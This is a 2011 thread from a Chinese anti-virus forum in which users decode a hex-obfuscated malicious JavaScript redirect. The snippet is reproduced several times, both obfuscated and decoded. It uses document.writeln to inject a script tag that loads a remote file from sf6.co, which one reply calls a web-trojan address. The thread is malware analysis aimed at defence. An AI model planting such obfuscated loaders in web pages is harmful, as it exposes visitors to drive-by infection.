高手进来看下这种恶意跳转代码用什么加密的 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流高手进来看下这种恶意跳转代码用什么加密的

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] 高手进来看下这种恶意跳转代码用什么加密的

夜色风情初生襁褓狮帖子:12 注册: 2011-01-24 来自:	发表于： 2011-08-14 20:43 \| 只看楼主短消息资料字号：小中大 1楼高手进来看下这种恶意跳转代码用什么加密的调用的代码加密了 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x73\x66\x36\x2e\x63\x6f\/\x6f\x6b\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"); 也不知道用干什么软件加的，谁知道这是怎么加密的，用的什么软件用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
夜色风情初生襁褓狮帖子:12 注册: 2011-01-24 来自:	分享到：

小镜童反毒学员帖子:201 注册: 2011-06-01 来自:	发表于： 2011-08-15 08:38 \| 短消息资料字号：小中大 2楼回复：高手进来看下这种恶意跳转代码用什么加密的楼主你好。您提供的代码可能在被解密前是和shellcode网马具有相同的特征（特别说明：楼主您提供的代码并不是shellcode形式，可能是解密shellcode或alph2加密代码之后形成的中间代码）；我把您贴上的代码复制到了FreShow工作区域中，经过一次esc解密即可看到最终的网马地址，如下图（该网址由于后缀名为.js，其实是一个javascript脚本，需要继续解密才能得到最终的网马地址）：附件: 文件名:网马加密.png 下载次数:1172 文件类型:image/png 文件大小: 上传时间:2011-8-15 8:43:20 描述:png 小镜童最后编辑于 2011-08-15 12:50:54
小镜童反毒学员帖子:201 注册: 2011-06-01 来自:

是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰	发表于： 2011-08-15 11:54 \| 短消息资料字号：小中大 3楼回复 2F 小镜童的帖子只学工具,不懂原理,你见过这样的shellcode? My Blog
是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰

小镜童反毒学员帖子:201 注册: 2011-06-01 来自:	发表于： 2011-08-15 12:28 \| 短消息资料字号：小中大 4楼回复 3F 是昔流芳的帖子额。。不好意思，可能是我表述得不清楚，我的意思并不是说楼主提供的代码是shellcode，而是说可能是shellcode经过一次esc解密之后形成的中间代码，至于该中间代码（即楼主提供的代码）的加密形式，还请大师您为我们解读。如果我之前的表述造成了楼主的误解，敬请谅解！（原回复已加上“特别说明”）小镜童最后编辑于 2011-08-15 12:52:45
小镜童反毒学员帖子:201 注册: 2011-06-01 来自:

小镜童反毒学员帖子:201 注册: 2011-06-01 来自:	发表于： 2011-08-15 13:40 \| 短消息资料字号：小中大 5楼回复 1F 夜色风情的帖子楼主你好，通过查阅相关资料，您提供的代码是通过16进制进行的简单加密，\x64就是十六进制的64，对应于十进制的100，通过ASCII表转换字符是d，依次类推，可以得到下面的结果： window["document"]["writeln"]("<script type="text/javascript"src=" http://sf6.co/ok.js"><script>");
小镜童反毒学员帖子:201 注册: 2011-06-01 来自:

deng520 反毒学员帖子:822 注册: 2011-06-17 来自:	发表于： 2011-08-16 10:47 \| 短消息资料字号：小中大 6楼回复: 高手进来看下这种恶意跳转代码用什么加密的你这段代码只是javascript中的一部分吧，可以用alert法转换一下就知道答案了 <script>alert window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x73\x66\x36\x2e\x63\x6f\/\x6f\x6b\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"); </script> <script>alertwindow["document"]["writeln"]("<script type="text/javascript" src="http://sf6.co/ok.js"></script>"); </script> 这个没加密只是用16进制转换了一下。。。。。。。哈哈小流氓来啦大家快逃啊
deng520 反毒学员帖子:822 注册: 2011-06-17 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT